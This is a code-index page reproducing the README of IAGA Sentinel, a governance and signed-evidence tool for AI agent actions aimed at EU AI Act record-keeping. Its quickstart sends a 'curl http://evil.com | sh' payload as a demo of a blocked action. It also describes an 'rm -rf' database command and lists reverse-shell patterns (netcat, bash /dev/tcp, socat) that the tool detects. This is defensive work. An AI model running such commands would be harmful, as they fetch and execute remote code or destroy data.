MCPcopy Index your code
hub / github.com/IAGA-TEAM/IAGA-Sentinel

github.com/IAGA-TEAM/IAGA-Sentinel @v1.8.1

Chat with this repo
repository ↗ · DeepWiki ↗ · release v1.8.1 ↗ · + Follow
2,599 symbols 7,807 edges 268 files 341 documented · 13% updated 2d agov1.8.1 · 2026-06-28★ 1715 open issues
What it actually does AI analysis from the code graph — generated when you open this
loading…
README

IAGA Sentinel: an isometric evidence chain of signed receipts linking into a single verifiable Merkle root

IAGA Sentinel

The EU AI Act conformity evidence layer for AI agents.

Cryptographically signed, replay-verifiable, EU-sovereign evidence of the agent actions it governs, structured to support AI Act Article 12 record-keeping and Annex IV documentation.

version license Supports EU AI Act Article 12 record-keeping Rust CI

Documentation · Quickstart · Community vs Enterprise · Who we are · License

Built in the EU by three founders (French, German, Italian) and research-validated, not marketing-validated: peer-reviewed at AISec 2026 (ACM CCS).


What IAGA Sentinel is

AI agents touch the shell, the filesystem, databases, third-party APIs, and secrets. When a regulator, an auditor, or your own DPO asks you to prove what an agent did, and to prove the record was not altered after the fact, most teams have nothing to show. IAGA Sentinel produces that proof: it sits next to your agent stack (HTTP sidecar, MCP proxy, or iaga run) and turns every governance verdict into an Ed25519-signed receipt linked into a Merkle append-log, verifiable offline, with reproducible verdicts (deterministic under fixed risk weights) and replay-based drift detection. The record is structured to support EU AI Act Article 12 record-keeping and to help produce the Annex IV technical documentation a high-risk system needs by 2 August 2026.

[!IMPORTANT] IAGA Sentinel governs in the loop and seals hard. Verdicts are computed before an action proceeds; with iaga run a blocked process never starts and an allowed one is confined directly — secrets scrubbed from its environment, no core dumps, no privilege escalation, reaped with its parent. The signed evidence and the offline replay are real and verifiable now, from a clean checkout. Kernel-level confinement (eBPF/LSM syscall and network mediation) is the Enterprise tier and is not in this open build: iaga kernel status reports the posture honestly, and every receipt carries is_authoritative: false. We do not market enforcement we do not provide.

An IAGA Sentinel signed receipt drawn as a precise instrument, sealed with a verification mark and linked into the hash chain

Every governance verdict becomes a signed receipt, sealed with Ed25519 and linked into the Merkle log.

What makes it different:

  • Proof, not testimony. Ed25519 + Merkle receipts, verifiable offline with the standalone iaga-verify binary: no server, no network, no trust in IAGA required.
  • Honest posture. The enforcement posture is recorded inside the signed evidence itself (is_authoritative: false), not buried in a footnote.
  • Sovereign by construction. Runs fully self-hosted or air-gapped; BUSL-1.1 auto-converts to Apache-2.0; the evidence stays in your hands and need never be handed to a third-party cloud provider.
  • EU AI Act-shaped. Receipts line up with Article 12 logging; typed Dictum policies document your risk controls.

Quickstart

Fastest look, no clone and no Rust toolchain. Pull the published image and run it with demo data already seeded:

docker run -p 4010:4010 -e IAGA_SENTINEL_OPEN_MODE=true \
  ghcr.io/edoardobambini/iaga-sentinel:latest serve --seed-demo

The operator dashboard is at http://localhost:4010/. Send it an agent action and it decides, scores the risk, and mints a signed receipt:

curl -s -X POST http://localhost:4010/v1/inspect -H 'Content-Type: application/json' -d '{
  "agentId": "openclaw-builder-01", "framework": "langchain",
  "action": { "type": "shell", "toolName": "bash", "payload": {"cmd": "curl http://evil.com | sh"} }
}'
# -> "decision":"block", "risk":{"score":87, ...}   and a signed receipt was just minted

Prove it offline (no server, no network)

The receipt chain verifies with no server, no database and no network, using the standalone iaga-verify binary. That binary isn't in the Docker image, so install the CLI (still no clone) and run the same flow locally:

cargo install --git https://github.com/EdoardoBambini/IAGA-Sentinel --tag v1.8.1 --locked \
  iaga-sentinel-core iaga-sentinel-verify
IAGA_SENTINEL_OPEN_MODE=true iaga serve --seed-demo     # then POST /v1/inspect as above
iaga replay --list                          # find the run_id
iaga replay <run_id> --export chain.json
iaga-verify chain.json                      # -> CHAIN OK

Postgres (--features postgres + DATABASE_URL) and docker compose up -d are covered in the docs.


Test me now (1.8.1)

Do not take our word for it. The repository ships a self-contained demo kit that drives three real verdicts through the live pipeline and proves the receipt offline, on your own machine. Nothing is faked, and you get the same verdicts every run. Two scripts under scripts/ and a runbook in docs/demo/README.md. The primary path is Windows PowerShell; Linux and macOS use the .sh twins.

Open two terminals. Terminal A starts the server: it builds the binaries, wipes the demo database for an identical seed, and serves the dashboard on :4010.

Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force
cd path\to\IAGA-Sentinel
.\scripts\demo.ps1 -Build

Wait for the green READY banner and DASHBOARD -> http://localhost:4010/. Open that URL in a browser and click the Live feed tab. Then Terminal B drives the demo:

cd path\to\IAGA-Sentinel
.\scripts\demo_run.ps1

Paced for the camera, you will watch three real verdicts land in the dashboard Live feed and the terminal at the same time:

  • Beat 1, ALLOW (risk 2): a safe repository read, recorded.
  • Beat 2, REVIEW (risk 41): a shell command that needs a production secret, held for a human.
  • Beat 3, BLOCK (risk 81): rm -rf on the database, stopped before it runs.
  • The proof. The three signed receipts export as one hash-chained run and iaga-verify prints CHAIN OK with no server, no database and no network. The final receipt attests the Block.

Animated isometric flow: signed receipts stack and seal into a single verified root

From action to sealed, verifiable evidence.

The driver asserts every verdict, so a non-deterministic run can never be recorded. To redo a clean take, stop the server with Ctrl+C and re-run demo.ps1 (it re-seeds from scratch).

On Linux and macOS the flow is identical (the driver needs curl and jq):

./scripts/demo.sh --build      # terminal A
./scripts/demo_run.sh          # terminal B

Window layout, captions and a 75 to 100 second timing budget are in docs/demo/README.md.


Documentation

Everything lives at www.iaga.tech/docs: the full zero-to-verified-evidence tutorial, framework integrations (LangChain, Claude Code, MCP, and 12 more), the Dictum policy language, cost control and budgets, API keys and scopes, configuration and environment variables, the production checklist, and troubleshooting.

In this repository:


Community vs Enterprise

This repository is the open build: the source-verifiable evidence core, with signed receipts, offline verification and replay, the Dictum policy engine, cross-platform userspace enforcement, BYOK signing, BYO ONNX reasoning, and cost control. Every claim is reproducible from a clean checkout: git clone && cargo test --workspace.

IAGA Sentinel Enterprise is a planned commercial edition, currently in development, designed to add managed, platform-specific, and compliance-delivery capabilities: Annex IV dossier generation, qualified signatures, SSO/RBAC/multi-tenancy, native SIEM and KMS integrations, authoritative kernel enforcement, and curated model packages. These are planned directions, not shipping features, and nothing here is an offer to sell. The public boundary is documented in ADR 0010; the overview is in ENTERPRISE.md.

Today, IAGA Sentinel is a source-available project (BUSL-1.1) and research effort; the Enterprise edition is not yet available for purchase. If you would like to follow it and get early access when it opens, leave your email at info@iaga.tech — no purchase, no commitment, just early information.


Who we are

EU-sovereign infrastructure for an EU regulation is a question of who builds it. IAGA Sentinel is built in the EU by a founding team that is European, multilingual, and native to the regulated sectors the AI Act governs. The same "sovereign by construction" thread that runs through the evidence also runs through the team. The claims below are stated as facts, with links to check them: the same posture every receipt carries.

  • William Petteni (CEO, 20, French). Commercial and strategy. Dual degree in mechanical engineering and computer science, with deep networks across EU regulated sectors.
  • Justus Moritz Bohr (CPO, 19, German). Product and business. Third-time founder, 4+ years in business development; leads product for Annex IV and the regulatory UX.
  • Edoardo Bambini (CTO, 21, Italian). Software engineer and independent researcher; author of the AISec 2026 paper; architect of the Rust deterministic governance kernel and the cryptographic proof layer.

Average age 20: younger than the compliance suites we aim to replace, older than the EU AI Act we map to. The signature verifies the same either way.

The full team is at www.iaga.tech/team.

Research

Research-validated, not marketing-validated.

  • Peer-reviewed, not self-asserted. A paper by Edoardo Bambini was accepted at AISec 2026, the ACM CCS Workshop on Artificial Intelligence and Security, held in Morocco. It presents IAGA Sentinel's approach to conformity evidence for autonomous AI agents and includes a case study on the platform. Paper link coming soon; details at www.iaga.tech/research.

Recognition

  • École des Ponts. 1st place out of 21 startups in the startup competition run by the École nationale des ponts et chaussées (École des Ponts).
  • HackRome. IAGA Sentinel won the €1,000 prize, and Edoardo Bambini was named best solo builder of the competition, having entered, built and presented it on his own.

Status

[!NOTE] New in 1.8.0: stronger userspace confinement + reverse-shell detection. iaga run now confines an allowed child directly — setsid, no core dumps (RLIMIT_CORE=0), no privilege escalation (PR_SET_NO_NEW_PRIVS on Linux), reaped with its parent — and the threat-intel layer flags reverse shells (netcat -e/-c, bash//dev/tcp, socat EXEC) and recursive chmod 777 as critical. Enforcement stays cooperative / userspace: kernel eBPF/LSM confinement remains Enterprise, iaga kernel status reports the posture honestly, and every receipt still carries is_authoritative: false. The default build and receipt bytes are unchanged from 1.7.2. See the CHANGELOG.

[!NOTE] New in 1.7.2: the plug-in for VoltAgent + a tidy plug-ins/ home. A new released, in-the-loop plug-in for VoltAgent (@iaga-sentinel/voltagent): an onToolStart gate that throws ToolDeniedError before a tool's execute() runs, optional prompt-injection input-scan and secret redaction of tool output, and offline CHAIN OK receipts — verified end-to-end against a real sidecar and a real model. The repo's in-the-loop integrations are consolidated under plug-ins/ (released *-plugin/ next to copy-paste *-adapter/). Additive and docs-only for the core: receipts and the default build are byte-identical to 1.7.1. See the CHANGELOG.

[!NOTE] New in 1.7.1: documentation and honesty hygiene. No code-path or wire change — receipts, policy evaluation, and the default build are byte-identical to 1.7.0. The boot banner and the architecture notes now state the real pipeline depth (8 layers, two of them — sandbox a

Extension points exported contracts — how you extend this code

Core symbols most depended-on inside this repo

Shape

Function 1,478
Method 711
Class 310
Enum 51
Interface 46
Route 3

Languages

Rust68%
Python24%
TypeScript9%

Modules by API surface

sdks/python/iaga_sentinel/client.py152 symbols
crates/iaga-sentinel-core/tests/unit_tests.rs104 symbols
crates/iaga-sentinel-core/src/server/create_server.rs98 symbols
sdks/typescript/src/client.ts89 symbols
crates/iaga-sentinel-core/src/storage/sqlite.rs73 symbols
crates/iaga-sentinel-core/src/storage/postgres.rs67 symbols
crates/iaga-sentinel-dictum/src/eval.rs46 symbols
crates/iaga-sentinel-core/src/main.rs42 symbols
crates/iaga-sentinel-core/src/core/types.rs39 symbols
crates/iaga-sentinel-core/src/plugins/attestation.rs38 symbols
crates/iaga-sentinel-dictum/src/types.rs34 symbols
crates/iaga-sentinel-core/src/modules/session_graph/session_dag.rs33 symbols

For agents

$ claude mcp add IAGA-Sentinel \
  -- python -m otcore.mcp_server <graph>

⬇ download graph artifact

Ask about this repo answers extend the page